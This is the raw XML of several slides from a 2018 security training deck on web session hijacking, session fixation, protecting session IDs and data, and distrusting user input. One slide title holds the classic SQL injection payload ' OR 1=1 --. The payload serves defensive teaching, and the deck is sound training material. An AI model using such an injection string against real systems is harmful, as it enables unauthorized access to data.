              <a:t>Store all session data on the server-side. Cookie should have a reference only.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2227" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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31" name="hijacking.jpg" descr="hijacking.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16934" y="-31750"/>
            <a:ext cx="24496890" cy="13779500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2232" name="Session Hijacking"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2233"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2234"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235" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2236"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fast"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0" name="Session Hijacking"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2241" name="An attacker takes over the session of another user.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>An attacker takes over the session of another user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Stolen session identifier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Guessed session identifier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Manipulating cookie that wasn’t stored properly.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2242"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24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244" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2245"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9" name="Session Fixation"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2250" name="Attacker logs in and gets their own session ID.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="881944" indent="-881944">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Attacker logs in and gets their own session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="881944" indent="-881944">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Attacker crafts a URL with that session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="881944" indent="-881944">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>User visits attacker URL, and logs in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="881944" indent="-881944">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Attacker now controls user session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2251"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252"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253" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2254"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58"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25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260" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2261" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2262" name="Cookies are user supplied data. Do not trust them without verifying."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cookies are user supplied data. Do not trust them without verifying.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2263" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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7" name="Verifying Session"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Verifying Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2268" name="Validate that it hasn’t expired.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Validate that it hasn’t expired.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Confirm that you created the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Can do “loose IP” check (verify first few octets).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2269"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270"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271" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2272" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2275" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="20026248" y="1150011"/>
            <a:ext cx="3036095" cy="3036095"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3036093" cy="3036093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2273" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3036094" cy="3036094"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="2274" name="✔"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="672296" y="544953"/>
              <a:ext cx="1843771" cy="20984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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr sz="15000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>✔</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2276" name="YMMV as to how useful this is."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16485595" y="10710949"/>
            <a:ext cx="3614093" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>YMMV as to how useful this is.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2277" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="14072726" y="9901170"/>
            <a:ext cx="2183409" cy="977967"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast" advClick="1"/>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1" name="Protecting Session IDs"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Protecting Session IDs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2282" name="Session IDs should be unique and random.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5200"/>
            </a:pPr>
            <a:r>
              <a:t>Session IDs should be </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>unique and random</a:t>
            </a:r>
            <a:r>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5200"/>
            </a:pPr>
            <a:r>
              <a:t>Session ID cookies should have a domain, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>httpOnly</a:t>
            </a:r>
            <a:r>
              <a:t> flags set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5200"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>ALWAYS</a:t>
            </a:r>
            <a:r>
              <a:t> regenerate the session ID when elevating privileges.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2283"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284"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285" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2286" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2287" name="https://martinfowler.com/articles/session-secret.html"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://martinfowler.com/articles/session-secret.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2288" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2289" name="id-verified.png" descr="id-verified.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19216617" y="498408"/>
            <a:ext cx="4902202" cy="4902201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>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3" name="Protecting Session Data"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Protecting Session Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2294" name="All session data should be stored server-side.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5200"/>
            </a:pPr>
            <a:r>
              <a:t>All session data should be stored server-side. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5200"/>
            </a:pPr>
            <a:r>
              <a:t>Expire sessions on the server-side, don’t rely on cookie expiration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5200"/>
            </a:pPr>
            <a:r>
              <a:t>When a user logs out, destroy their session on server too!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2295"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296"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297" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2298" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2299" name="25c151-data-encryption-512.png" descr="25c151-data-encryption-512.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19558000" y="1034322"/>
            <a:ext cx="3826934" cy="382693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QL Injection' OR 1=1 --"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' OR 1=1 --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="356"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357"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358" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359"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med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3"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304"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305" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2306" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2307" name="Never Trust User Input"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Never Trust User Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2308" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="input_validation.jpg" descr="input_validation.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="70279"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
